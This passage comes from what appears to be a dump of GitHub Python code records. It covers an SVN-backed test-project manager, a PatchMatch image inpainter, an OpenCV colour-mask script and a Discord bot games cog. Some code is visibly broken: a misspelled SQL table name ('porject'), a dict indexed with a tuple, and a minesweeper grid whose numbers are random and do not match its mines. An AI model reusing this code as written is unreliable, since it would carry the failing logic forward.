ReadExcelHelper(ui_repository_path)\n\n sheet_name = 'UIElements'\n datas = excel_helper.get_row_datas(sheet_name)\n datas = datas[1:]\n ui_repository = {}\n page_name = None\n pages = []\n for data in datas:\n if data[0]:\n page_name = data[0]\n pages.append(page_name)\n ui_repository[page_name] = []\n ui_repository[page_name].append(\n {'name': data[1], 'find_method': data[2], 'value': data[3], 'index': data[4], 'desc': data[5]})\n\n # insert into db\n for page in pages:\n page_sql = 'insert into `page` (project_id, `name`, os_type) values (%s, %s ,%s) '\n params = (project_id, page, 1)\n page_id = utils.str_to_int(self.db.execute(page_sql, params))\n uis = ui_repository[page]\n ui_datas = []\n for ui in uis:\n ui_data = (page_id, ui['name'], ui['find_method'], str(ui['value']).replace(\"'\", \"\\'\"),\n utils.str_to_int(ui['index']), ui['desc'].replace(\"'\", \"\\'\"))\n ui_datas.append(ui_data)\n ui_sql = \"\"\"\n insert into ui_repository (`page_id`, `name`, `find_method`, `value`, `index`, `desc`)\n values (%s, %s, %s, %s, %s, %s)\n \"\"\"\n self.db.execute_many(ui_sql, ui_datas)\n else:\n error_code = error_constant.project_ui_repository_not_exist\n error_msg = error_constant.errors.get(error_code) % ui_repository_path\n raise RainbowCenterException(error_msg, error_code)\n except 
RainbowCenterException as ex:\n raise ex\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_scan_ui_repository_failed\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n\n def update(self, values):\n success = False\n try:\n project_id = values['project_id']\n project = self.get_projects(project_id)\n\n if not project:\n error_code = error_constant.project_not_exist\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n\n if 'svn_url' in values:\n svn_revision = utils.get_revision_from_svn(values['svn_url'])\n if svn_revision:\n values['svn_revision'] = svn_revision\n else:\n error_code = error_constant.project_svn_url_invalid\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n sql = '''update porject set update_date = now()'''\n params = []\n sql, params = self.db.assemble_sql(sql,params, values, \"\")\n sql += ' where id = %s '\n params.append(project_id)\n self.db.execute(sql,params)\n\n if 'svn_url' in values:\n code_path = os.sep.join([project['path'], 'code']).replace('/','\\\\')\n utils.checkout(values['svn_url', code_path])\n\n if 'scan_case' in values and values['scan_case']:\n self.testcase_manager.del_cases(project_id)\n project['scan_case'] = values['scan_case']\n self.testcase_manager.scan_cases(project)\n\n if 'scan_ui' in values and values['scan_ui']:\n self.scan_ui_repository(project)\n\n success = True\n\n except RainbowCenterException as ex:\n raise ex\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_update_failed\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n return success\n\n def update_svn_version(self, project_id):\n project = self.get_project(project_id)\n svn_url = project['svn_url']\n\n versions = self.get_versions({'project_id': project_id})\n path_list = []\n tmp_list = utils.get_path_list_from_svn(svn_url)\n\n for path in tmp_list:\n version_data = [] # project_id, path, revision\n version_data.append(project_id)\n if path == 'trunk':\n path_list.append(path)\n elif path == 'branches':\n path = svn_url + '/' + path\n branch_path_list = utils.get_path_list_from_svn(path)\n for branch_path in branch_path_list:\n path_list.append('branches/' + branch_path)\n\n update_datas = []\n del_datas = []\n for version in versions:\n svn_path = version['svn_path']\n version_id = version['id']\n if svn_path in path_list:\n revision = utils.get_revision_from_svn(svn_url + '/' + svn_path)\n update_datas.append([revision, version_id])\n path_list.remove(svn_path)\n else:\n del_datas.append(version_id)\n\n if update_datas:\n update_sql = 'update project_svn_version set `version` = %s where id = %s'\n self.db.execute_many(update_sql, update_datas)\n\n if del_datas:\n tmp = '%s,' * len(del_datas)\n del_sql = 'delete from project_svn_version where id in ('\n del_sql += tmp[:-1]\n del_sql += ')'\n self.db.execute(del_sql, del_datas)\n\n insert_datas = []\n if path_list:\n for path in path_list:\n revision = utils.get_revision_from_svn(svn_url + '/' + path)\n insert_datas.append([project_id, path, revision])\n insert_sql = 'insert into project_svn_version (project_id, svn_path, `version`) values (%s, %s, %s)'\n self.db.execute_many(insert_sql, insert_datas)\n\n def get_versions(self, condition=None):\n versions = []\n try:\n params = 
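`scan_ui_repository` above reads a sheet where only the first row of each page names it and blank first cells mean "same page as the previous row". A sketch of that forward-fill grouping, assuming, as the sheet does, that the first data row names a page; the sample rows are invented:

```python
# Group sheet rows into pages: a non-empty first cell starts a new page,
# a blank one continues the previous page (forward fill).
def group_rows_by_page(rows):
    pages, current = {}, None
    for row in rows:
        if row[0]:
            current = row[0]
            pages[current] = []
        pages[current].append({'name': row[1], 'find_method': row[2],
                               'value': row[3]})
    return pages

rows = [
    ('LoginPage', 'username', 'id', 'user_input'),
    ('',          'password', 'id', 'pass_input'),
    ('HomePage',  'logout',   'xpath', '//a[1]'),
]
print(group_rows_by_page(rows))
```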
[]\n sql = 'select * from project_svn_version where 1 = 1 '\n dics = {\n 'project_id' : (condition and 'project_id' in condition) and condition['project_id'] or None,\n 'id' : (condition and 'version_id' in condition) and condition['version_id'] or None\n }\n sql, params = self.db.assemble_sql(sql, params, dics, 'and')\n result = self.db.query(sql, params)\n for item in result:\n svn_path = item['svn_path']\n item['svn_version'] = svn_path\n if svn_path.find('branches') != -1:\n item['svn_version'] = svn_path.replace('branches/', '')\n versions.append(item)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return versions\n\n def count_ui_repository(self, project_id):\n row_count = 0\n try:\n sql = \"\"\"\n select ur.*, p.name page_name\n from ui_repository ur\n left join page p on p.id = ur.page_id\n left join project pj on pj.id = p.project_id\n where pj.id = %s\n \"\"\"\n row_count = self.db.row_count(sql, [project_id])\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return row_count\n\n def get_ui_repository(self, condition=None):\n ui_repository = None\n try:\n params = []\n sql = \"\"\"\n select ur.*, p.name page_name\n from ui_repository ur\n left join page p on p.id = ur.page_id\n left join project pj on pj.id = p.project_id\n where 1 =1\n \"\"\"\n dics = {\n 'pj.id': (condition and 'project_id' in condition) and condition['project_id'] or None,\n 'cur_page': (condition and 'cur_page' in condition) and condition['cur_page'] or None\n }\n sql, params = self.db.assemble_sql(sql, params, dics, 'and', 'ur.id', 'asc')\n ui_repository = self.db.query(sql, params)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return ui_repository\n","repo_name":"huangtao/tonardo_test","sub_path":"com/boyaa/RainbowCenter/manager/project_manager.py","file_name":"project_manager.py","file_ext":"py","file_size_in_byte":19049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69877837691","text":"import cv2\nimport numpy as np\n\nclass inpainter:\n\n def __init__(self, alpha):\n self.image = None\n self.padImage = None\n self.mask = None\n self.padMask = None\n self.offset = None\n self.alpha = alpha\n \n return\n\n def illegal(self, row : int, col : int) -> bool:\n if(row < 0 or col < 0):\n return True\n\n if(row >= self.image.shape[0] or col >= self.image.shape[1]):\n return True\n\n if(self.mask[row, col]): # in hole\n return True\n return False\n \n\n def initialize_offset(self):\n for i in range(self.mask.shape[0]): # for each row\n for j in range(self.mask.shape[1]): # for each column\n if(not self.mask[i, j]):\n self.offset[i, j] = [0, 0]\n else:\n while(1):\n rRow = np.random.randint(self.mask.shape[0], dtype = np.int32)\n rCol = np.random.randint(self.mask.shape[1], dtype = np.int32)\n if(not self.illegal(rRow, rCol)):\n self.offset[i, j] = [rRow - i, rCol - j]\n break\n self.offset.astype(np.int32)\n return\n\n def cropPatch(self, image, i : int, j : int, patchSize : int):\n halfSize = int(patchSize / 2)\n\n return image[int(i - halfSize) : int(i + halfSize + 1), int(j - halfSize): int(j + halfSize + 1), :]\n \n def patchDiff(self, patch1, patch2):\n if(patch1.shape != patch2.shape):\n return float(\"inf\")\n else:\n diff = (patch1.astype(np.float32) - patch2.astype(np.float32))\n \n return np.linalg.norm(diff)\n\n def smallestPatchDiff(self, diff1, diff2, diff3):\n if(diff1 <= diff2):\n if(diff1 <= diff3):\n return 1\n else:\n return 3\n else:\n 
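`update_svn_version` above reconciles stored version rows against the paths currently on the SVN server: matches are refreshed, leftovers in the table are deleted, leftovers in the source list are inserted. The skeleton of that three-way split, with toy data:

```python
# Three-way reconcile: rows still present get updated, rows gone from the
# source get deleted, source entries with no row get inserted.
def reconcile(db_rows, source_paths):
    remaining = list(source_paths)
    updates, deletes = [], []
    for row_id, path in db_rows:
        if path in remaining:
            updates.append(row_id)      # still on the SVN server: refresh it
            remaining.remove(path)
        else:
            deletes.append(row_id)      # gone from SVN: drop the row
    inserts = remaining                 # new on SVN: add rows
    return updates, deletes, inserts

print(reconcile([(1, 'trunk'), (2, 'branches/old')], ['trunk', 'branches/new']))
# ([1], [2], ['branches/new'])
```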
if(diff2 <= diff3):\n return 2\n else:\n return 3\n\n def propagation(self, count : int, row : int, col : int, patchSize: int):\n padSize = patchSize // 2\n if(count % 2 == 0): \n\n holePatch = self.cropPatch(self.padImage, row+padSize, col+padSize, patchSize)\n\n refPos = (self.offset[row, col] + np.array([row, col])).astype(np.int32)\n refPatch = self.cropPatch(self.padImage, refPos[0]+padSize, refPos[1]+padSize, patchSize)\n\n lrefPos =(self.offset[row, col-1] + np.array([row, col-1])).astype(np.int32)\n lrefPos[1] += 1\n lrefPatch = self.cropPatch(self.padImage, lrefPos[0]+padSize, lrefPos[1]+padSize, patchSize)\n\n urefPos =(self.offset[row-1, col] + np.array([row-1, col])).astype(np.int32)\n urefPos [0] += 1\n urefPatch = self.cropPatch(self.padImage, urefPos[0]+padSize, urefPos[1]+padSize, patchSize)\n\n refDiff = self.patchDiff(holePatch, refPatch)\n lrefDiff = self.patchDiff(holePatch, lrefPatch)\n urefDiff = self.patchDiff(holePatch, urefPatch)\n if(self.illegal(lrefPos[0], lrefPos[1])):\n lrefDiff = float(\"inf\")\n if(self.illegal(urefPos[0], urefPos[1])):\n urefDiff = float(\"inf\")\n\n smallIdx = self.smallestPatchDiff(refDiff, lrefDiff, urefDiff)\n #print(f\" Small Idx : \", smallIdx)\n if(smallIdx == 2):\n self.offset[row, col] = self.offset[row, col-1]\n elif(smallIdx == 3):\n self.offset[row, col] = self.offset[row-1, col]\n \n else:\n \n holePatch = self.cropPatch(self.padImage, row+padSize, col+padSize, patchSize)\n\n refPos = (self.offset[row, col] + np.array([row, col])).astype(np.int32)\n refPatch = self.cropPatch(self.padImage, refPos[0]+padSize, refPos[1]+padSize, patchSize)\n\n rrefPos =(self.offset[row, col+1] + np.array([row, col+1])).astype(np.int32)\n rrefPos[1] -= 1\n rrefPatch = self.cropPatch(self.padImage, rrefPos[0]+padSize, rrefPos[1]+padSize, patchSize)\n\n brefPos = (self.offset[row+1, col] + np.array([row+1, col])).astype(np.int32)\n brefPos [0] -= 1\n brefPatch = self.cropPatch(self.padImage, brefPos[0]+padSize, brefPos[1]+padSize, patchSize)\n\n refDiff = self.patchDiff(holePatch, refPatch)\n rrefDiff = self.patchDiff(holePatch, rrefPatch)\n brefDiff = self.patchDiff(holePatch, brefPatch)\n if(self.illegal(rrefPos[0], rrefPos[1])):\n rrefDiff = float(\"inf\")\n if(self.illegal(brefPos[0], brefPos[1])):\n brefDiff = float(\"inf\")\n\n smallIdx = self.smallestPatchDiff(refDiff, rrefDiff, brefDiff)\n #print(f\" Small Idx : \", smallIdx)\n if(smallIdx == 2):\n self.offset[row, col] = self.offset[row, col+1]\n elif(smallIdx == 3):\n self.offset[row, col] = self.offset[row+1, col]\n return\n\n def randomSearch(self, row : int, col : int, patchSize: int):\n iterCount = 0.\n padSize = patchSize // 2\n w = max(self.image.shape)\n count = 0\n while(1):\n count+= 1\n if(count > 50):\n break\n\n randomRow = np.random.rand(1)\n randomCol = np.random.rand(1)\n \n fraction = w * np.power(self.alpha, iterCount)\n #if(count == 1):\n #print(self.offset[row, col], fraction)\n if(fraction < 1.):\n break\n\n\n newRowOffset = int(self.offset[row, col][0] + fraction * randomRow)\n newColOffset = int(self.offset[row, col][1] + fraction * randomCol)\n\n newRefRow = newRowOffset + row\n newRefCol = newColOffset + col\n\n if(self.illegal(newRefRow, newRefCol)):\n\n continue\n\n count = 0\n\n holePatch = self.cropPatch(self.padImage, row + padSize, col + padSize, patchSize)\n\n oriPatch = self.cropPatch(self.padImage, row + self.offset[row, col][0] + padSize, col + self.offset[row, col][1] + padSize, patchSize)\n newPatch = self.cropPatch(self.padImage, newRefRow + padSize, 
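The random-search stage above samples around the current offset inside a window of `w * alpha^k`, shrinking geometrically until the radius drops below one pixel, as in the PatchMatch scheme. A sketch of just that radius schedule (`alpha=0.5` here is an assumed typical value; the class takes it as a constructor argument):

```python
# Shrinking search window: start at the image's larger side, decay by alpha
# each step, stop once the radius falls below one pixel.
def search_radii(w, alpha=0.5):
    k = 0
    while True:
        radius = w * (alpha ** k)
        if radius < 1.0:
            return
        yield radius
        k += 1

print(list(search_radii(w=256)))   # [256.0, 128.0, 64.0, ..., 2.0, 1.0]
```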
newRefCol + padSize, patchSize)\n\n oldDiff = self.patchDiff(holePatch, oriPatch)\n newDiff = self.patchDiff(holePatch, newPatch)\n\n if(oldDiff > newDiff):\n self.offset[row, col][0] = newRowOffset\n self.offset[row, col][1] = newColOffset\n iterCount += 1\n return\n\n def pastePatch(self, patchSize):\n padSize = int(patchSize / 2)\n halfSize = padSize\n for i in range(0, self.mask.shape[0]):\n for j in range(0, self.mask.shape[1]):\n \n if(self.mask[i, j] == 1):\n #print(f\"Paste {i}, {j}\")\n refRow = int(i + self.offset[i, j][0])\n refCol = int(j + self.offset[i, j][1])\n #print(f\" with {refRow}, {refCol}\")\n refPatch = self.cropPatch(self.padImage, refRow+padSize, refCol+padSize, patchSize)\n patchMask = self.padMask[i - halfSize: i + halfSize+1, j - halfSize : j + halfSize+1] \n patchMask = np.dstack((patchMask, patchMask, patchMask))\n diff = refPatch - self.padImage[i - halfSize: i + halfSize+1, j - halfSize : j + halfSize+1]\n\n self.padImage[i - halfSize: i + halfSize+1, j - halfSize : j + halfSize+1] += (diff * patchMask)\n self.image = self.padImage[halfSize: -halfSize, halfSize:-halfSize]\n\n return\n\n def inpaint(self, image, mask, patchSize):\n self.image = image\n # print(self.image.shape)\n self.mask = mask\n self.offset = np.zeros(self.mask.shape + tuple([2]))\n self.initialize_offset()\n \n padSize = int(patchSize / 2)\n self.padMask = np.pad(self.mask, ((padSize, padSize), (padSize, padSize)), 'symmetric')\n self.padImage = np.pad(self.image, ((padSize, padSize), (padSize, padSize), (0, 0)), 'symmetric') #pad for dealing with margin\n \n for t in range(40):\n\n print(f\"Iteration {t} : \")\n \n if(t % 2 == 0):\n for i in range(self.mask.shape[0]): # for each row\n for j in range(self.mask.shape[1]): # for each column\n if(self.mask[i, j]):\n #print(f\" Prop {i}, {j}\")\n self.propagation(t, i, j, patchSize)\n #print(f\" Search {i}, {j}\")\n self.randomSearch(i, j, patchSize)\n else:\n for i in range(self.mask.shape[0])[::-1]: # for each row\n for j in range(self.mask.shape[1])[::-1]: # for each column\n if(self.mask[i, j]):\n self.propagation(t, i, j, patchSize)\n self.randomSearch(i, j, patchSize)\n self.pastePatch(patchSize)\n # cv2.imshow(\"Paste\", self.image)\n # cv2.waitKey(1000)\n\n return self.image\n\n\n ","repo_name":"jnfem112/VFX2022SPRING","sub_path":"project/code/inpainter.py","file_name":"inpainter.py","file_ext":"py","file_size_in_byte":9272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71870031932","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 20 15:57:02 2021\n\n@author: timka\n\"\"\"\n\nimport cv2 as cv\n\nimport numpy as np\n\nfn = 'p1.png'\nimg = cv.imread(fn)\nhsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n\nlower = np.array((70, 70, 70), np.uint8)\n\nupper = np.array((150,255,255), np.uint8)\n\nmask = cv.inRange(hsv, lower, upper)\nresult = cv.bitwise_and(img, img, mask = mask)\n\ncv.imshow('frame', img)\ncv.imshow('mask', mask)\ncv.imshow('result', result)\ncv.waitKey(0)\ncv.destroyAllWindows() ","repo_name":"hackatonstimkar/miritam-chelyabinsk","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40180822565","text":"# ----------------------------------------------#\n# hqs.bot © #\n# by phillip.hqs ∫ Thanks to alphaSnosh #\n# ----------------------------------------------#\nfrom discord.ext import commands\nfrom library.icons 
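The main loop above alternates scan direction per iteration, which is what lets propagation pull good offsets from left/up neighbours on even passes and right/down neighbours on odd ones. A sketch of the traversal order in isolation:

```python
# Alternating raster scan: even iterations sweep top-left to bottom-right,
# odd iterations sweep in reverse.
def scan_order(rows, cols, iteration):
    rng_r = range(rows) if iteration % 2 == 0 else range(rows - 1, -1, -1)
    for i in rng_r:
        rng_c = range(cols) if iteration % 2 == 0 else range(cols - 1, -1, -1)
        for j in rng_c:
            yield i, j

print(list(scan_order(2, 2, 0)))  # [(0, 0), (0, 1), (1, 0), (1, 1)]
print(list(scan_order(2, 2, 1)))  # [(1, 1), (1, 0), (0, 1), (0, 0)]
```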
import links\nfrom library.cog_text import about_text as wm\nfrom library.error_embeds import embeds\nfrom library.cog_info import colors, dice\nimport setup as botsetup\nimport discord\nimport asyncio\nimport random\n\n\nclass Games(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def ssp(self, ctx, args):\n ssp_choice = ['scissor', 'stone', 'paper']\n choice = random.choice(ssp_choice)\n icon = links.ssp\n\n if choice == 'scissor' and args == 'scissor':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'stone':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'paper':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'stone' and args == 'scissor':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'stone':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'paper':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'paper' and args == 'scissor':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'stone':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'paper':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n\n elif choice == 'scissor' and args == 'scissor':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'scissor':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'scissor':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'stone':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'stone' and args == 'stone':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n elif choice == 'paper' and args == 'stone':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n 
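The `ssp` command above enumerates every (choice, args) pair by hand, including duplicated branches. With the three moves ordered so that each beats its predecessor, one modular difference decides the outcome. A sketch (emoji titles copied from the embeds above):

```python
# paper(0) < scissor(1) < stone(2), each beating the one before it, and paper
# beating stone via wraparound; (player - bot) % 3 is 0 draw, 1 win, 2 loss.
import random

MOVES = ['paper', 'scissor', 'stone']

def judge(player: str, bot: str) -> str:
    diff = (MOVES.index(player) - MOVES.index(bot)) % 3
    return ('Drawn 🙄', 'You win 🎉', 'You lose 😂')[diff]

print(judge('stone', random.choice(MOVES)))
```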
s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'scissor' and args == 'paper':\n s = discord.Embed(title='You lose 😂', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'stone' and args == 'paper':\n s = discord.Embed(title='You win 🎉', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n elif choice == 'paper' and args == 'paper':\n s = discord.Embed(title='Drawn 🙄', description='', color=colors.fun)\n s.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=s)\n\n else:\n n = discord.Embed(title='Dont try to cheat', color=colors.red)\n n.set_author(name='Scissor, stone and paper',\n icon_url=icon)\n await ctx.send(embed=n)\n\n @commands.command()\n async def minesweeper(self, ctx):\n field00 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field01 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field02 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field03 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field04 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field05 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field06 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field07 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field08 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field10 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field11 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field12 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field13 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field14 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field15 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field16 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field17 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field18 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field20 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field21 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field22 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field23 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field24 = random.choice(['1️⃣', '2️⃣', '3️���', '💥'])\n field25 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field26 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field27 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field28 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field30 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field31 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field32 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field33 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field34 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field35 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field36 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field37 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field38 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field40 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field41 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field42 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field43 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field44 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field45 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field46 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field47 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field48 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field50 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field51 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field52 = random.choice(['1️⃣', '2️⃣', '3️⃣', 
'💥'])\n field53 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field54 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field55 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field56 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field57 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field58 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field60 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field61 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field62 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field63 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field64 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field65 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field66 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field67 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field68 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field70 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field71 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field72 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field73 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field74 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field75 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field76 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field77 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field78 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n field80 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field81 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field82 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field83 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field84 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field85 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field86 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field87 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n field88 = random.choice(['1️⃣', '2️⃣', '3️⃣', '💥'])\n\n minesweeper = f\"\"\"\n || {field00} || || {field10} || || {field20} || || {field30} || || {field40} || || {field50} || || {field60} || || {field70} || || {field80} ||\n || {field01} || || {field11} || || {field21} || || {field31} || || {field41} || || {field51} || || {field61} || || {field71} || || {field81} ||\n || {field02} || || {field12} || || {field22} || || {field32} || || {field42} || || {field52} || || {field62} || || {field72} || || {field82} ||\n || {field03} || || {field13} || || {field23} || || {field33} || || {field43} || || {field53} || || {field63} || || {field73} || || {field83} ||\n || {field04} || || {field14} || || {field24} || || {field34} || || {field44} || || {field54} || || {field64} || || {field74} || || {field84} ||\n || {field05} || || {field15} || || {field25} || || {field35} || || {field45} || || {field55} || || {field65} || || {field75} || || {field85} ||\n || {field06} || || {field16} || || {field26} || || {field36} || || {field46} || || {field56} || || {field66} || || {field76} || || {field86} ||\n || {field07} || || {field17} || || {field27} || || {field37} || || {field47} || || {field57} || || {field67} || || {field77} || || {field87} ||\n || {field08} || || {field18} || || {field28} || || {field38} || || {field48} || || {field58} || || {field68} || || {field78} || || {field88} ||\n \"\"\"\n m = discord.Embed(color=colors.fun, description=minesweeper)\n m.set_author(name='Minesweeper', url=botsetup.website, icon_url=links.minesweeper)\n m.set_footer(text=wm.footer)\n await ctx.send(embed=m)\n\n @commands.command()\n async def rolldice(self, ctx):\n dice_ = [f'{dice.dice_1}',\n f'{dice.dice_2}',\n f'{dice.dice_3}',\n f'{dice.dice_4}',\n f'{dice.dice_5}',\n f'{dice.dice_6}']\n\n rolldice = 
